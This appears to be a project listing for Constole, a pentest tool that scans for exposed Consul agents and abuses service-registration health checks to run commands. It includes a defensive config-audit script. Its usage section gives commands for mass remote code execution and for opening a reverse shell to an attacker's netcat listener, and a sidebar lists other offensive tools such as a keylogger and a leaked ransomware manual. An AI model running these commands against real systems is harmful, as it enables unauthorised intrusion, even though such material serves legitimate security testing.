TestingPens / Constole

Licence: other
Scan for and exploit Consul agents

Programming Languages

python

Projects that are alternatives of or similar to Constole

NIST-to-Tech
An open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)
Stars: ✭ 61 (+64.86%)
Mutual labels:  pentest, redteam, pentesting-tools
conti-pentester-guide-leak
Leaked pentesting manuals given to Conti ransomware crooks
Stars: ✭ 772 (+1986.49%)
Mutual labels:  pentest-scripts, pentesting-tools
Hackers Tool Kit
It's a framework filled with a lot of options and hacking tools you use directly in the script, from brute forcing to payload making. I'm still adding more stuff. I now have another tool out called htkl-lite; it's hackers-tool-kit, just not as big and messy. To see updates, check on my Instagram @tuf_unkn0wn, or if there are any problems, message me on Instagram.
Stars: ✭ 211 (+470.27%)
Mutual labels:  python-script, pentest
dirbpy
This is the new version of dirb in python
Stars: ✭ 36 (-2.7%)
Mutual labels:  python-script, security-scanner
Pentest-Bookmarkz
A collection of useful links for Pentesters
Stars: ✭ 118 (+218.92%)
Mutual labels:  pentest, pentesting-tools
Doxycannon
A poorman's proxycannon and botnet, using docker, ovpn files, and a dante socks5 proxy
Stars: ✭ 216 (+483.78%)
Mutual labels:  pentest, redteam
Some Pentesters SecurityResearchers RedTeamers
Some Pentesters, Security Researchers, Red Teamers from whom I learned a lot...
Stars: ✭ 60 (+62.16%)
Mutual labels:  redteam, pentesting-tools
Pentest
some pentest scripts & tools by [email protected]
Stars: ✭ 136 (+267.57%)
Mutual labels:  pentest, pentest-scripts
wifi-pentesting-guide
WiFi Penetration Testing Guide
Stars: ✭ 105 (+183.78%)
Mutual labels:  pentest-scripts, pentesting-tools
HellgateLoader CSharp
Load shellcode via HELLGATE, Rewrite hellgate with .net framework for learning purpose.
Stars: ✭ 73 (+97.3%)
Mutual labels:  pentest, redteam
1earn
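A security knowledge framework maintained by the ffffffff0x team, covering (but not limited to) web security, industrial control system security, forensics, incident response, blue team infrastructure deployment, post-exploitation, Linux security, and write-ups for various target machines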
Stars: ✭ 3,715 (+9940.54%)
Mutual labels:  pentest, redteam
Ladon
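Large-scale intranet penetration scanner & Cobalt Strike. Ladon 8.9 has 120 built-in modules, including information gathering / live host discovery / port scanning / service identification / password brute forcing / vulnerability detection / vulnerability exploitation. Vulnerability detection covers MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2; password brute forcing covers (Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm); remote command execution (smbexec/wmiexe/psexec/atexec/sshexec/webshell); privilege lowering and escalation with Runas, GetSystem; Poc/Exploit; supports Cobalt Strike 3.X-4.0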
Stars: ✭ 2,911 (+7767.57%)
Mutual labels:  pentest, security-scanner
Aboutsecurity
A list of payload and bypass lists for penetration testing and red team infrastructure build.
Stars: ✭ 166 (+348.65%)
Mutual labels:  pentest, redteam
Shodansploit
🔎 shodansploit > v1.3.0
Stars: ✭ 342 (+824.32%)
Mutual labels:  python-script, security-scanner
Passcat
Passwords Recovery Tool
Stars: ✭ 164 (+343.24%)
Mutual labels:  pentest, redteam
argus
Argus Advanced Remote & Local Keylogger For macOS and Windows
Stars: ✭ 87 (+135.14%)
Mutual labels:  pentest, pentesting-tools
Wsmanager
Webshell Manager
Stars: ✭ 99 (+167.57%)
Mutual labels:  pentest, redteam
Collection Document
Collection of quality safety articles. Awesome articles.
Stars: ✭ 1,387 (+3648.65%)
Mutual labels:  pentest, redteam
Gopher
C# tool to discover low hanging fruits
Stars: ✭ 73 (+97.3%)
Mutual labels:  redteam, pentesting-tools
volana
🌒 Shell command obfuscation to avoid detection systems
Stars: ✭ 38 (+2.7%)
Mutual labels:  pentest, redteam

Overview

Scan for Consul agents and exploit them to gain a shell. I've been messing around with Consul and, while reading the API, found the service registration endpoint. Registrations feature check functionality, which is typically used to provide health checks on nodes. A check can be an external application or script that performs some kind of health check and provides some form of output. Essentially, this can be any script you define to run at certain time intervals.
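
Whether a registered check may run a script depends on the agent's own configuration. As an added example (not part of Constole or the original page), the following audits a Consul agent configuration for the settings that expose script checks through the HTTP API. The function names and both sample configurations are constructed for illustration; the configuration keys are Consul agent options.

```python
import json

# Constructed sample configs (JSON form of a Consul agent config file).
EXPOSED = '{"client_addr": "0.0.0.0", "enable_script_checks": true}'
HARDENED = """{"client_addr": "127.0.0.1",
               "enable_local_script_checks": true,
               "acl": {"enabled": true, "default_policy": "deny"}}"""


def is_loopback(addr):
    # Anything that is not plainly loopback or a unix socket is treated as
    # exposed, including go-sockaddr templates, which are not evaluated here.
    return addr.startswith("127.") or addr == "::1" or addr.startswith("unix://")


def audit_agent_config(raw):
    """Return findings for a Consul agent config supplied as JSON text."""
    cfg = json.loads(raw)
    findings = []

    # enable_script_checks permits script checks registered over the HTTP API;
    # enable_local_script_checks limits them to checks defined in local files.
    if cfg.get("enable_script_checks", False):
        findings.append("enable_script_checks is true: script checks can be "
                        "registered via the API; use enable_local_script_checks")

    acl = cfg.get("acl", {})
    if not acl.get("enabled", False):
        findings.append("ACLs are disabled: service registration needs no token")
    elif acl.get("default_policy", "allow") != "deny":
        findings.append("ACL default_policy is not deny: anonymous requests "
                        "are allowed unless a rule denies them")

    # addresses.http overrides client_addr; both default to loopback.
    addresses = cfg.get("addresses", {})
    http_addrs = addresses.get("http", cfg.get("client_addr", "127.0.0.1")).split()
    exposed = [a for a in http_addrs if not is_loopback(a)]
    if exposed:
        findings.append("HTTP API bound to %s: restrict to loopback or "
                        "firewall port 8500" % ", ".join(exposed))
    return findings


if __name__ == "__main__":
    for name, raw in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, audit_agent_config(raw) or "no findings")
```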

Setup

pip install -r requirements.txt

Usage

To scan for hosts running vulnerable Consul agent services, you can provide a comma-separated list of targets (host:port,host:port,...) or an input file (1 target per line).

python constole.py --targets '10.50.30.1:8500,10.50.30.2:8500'
python constole.py --infile mytargets.txt

Remote Code Execution can be achieved across multiple hosts as follows:

python constole.py --infile mytargets.txt --cmd 'my command to run' --exploit

To obtain a reverse shell from the vulnerable host, start a netcat listener on your desired port and select a single target:

python constole.py --targets 10.50.30.1:8500 --lhost my_ip_address --lport my_listening_nc_port --exploit

Note that Constole will automatically try to deregister the service, after a time period, to assist in clean up during testing.
